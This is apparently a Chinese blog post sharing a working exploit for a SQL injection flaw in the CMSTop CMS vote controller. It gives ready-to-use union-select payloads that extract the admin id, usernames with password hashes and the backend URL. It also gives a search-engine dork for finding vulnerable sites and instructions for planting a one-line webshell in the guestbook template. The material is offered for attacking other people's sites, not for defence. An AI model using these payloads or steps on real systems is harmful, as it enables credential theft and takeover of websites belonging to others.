cmstop通杀注入漏洞

玩了几个月这个漏洞了
看到九区那边ztz大牛公布出exp了

漏洞文件/apps/vote/controller/vote.php
app.xxx.com/?app=vote&controller=vote&action=total&contentid=1

获取管理员id
[php]
?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select userid from cmstop_admin where departmentid=2 limit 0,1;#
[/php]

获取到底管理id是啥你就自己写啥
[php]
?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select concat(username,char(0x3d),password) from cmstop_member where userid=1;#
[/php]

读取后台地址
[php]
?app=vote&controller=vote&action=total&contentid=1%20and%201=2%20union%20select%20url%20from%20cmstop_mymenu%20where%201=1%20limit%200,1;%23
[/php]

cmstop只有app这个有动态脚本

关于如何找到这个动态的站

site:xxx.com inurl:roll.php

数据库文件
cmstop/config/db.php

关于拿shell

管理员帐号进入后台后直接模板里面guestbook模板插入一句话

然后访问app.xxx.com/?app=guestbook

大牛研究去吧。。

发表评论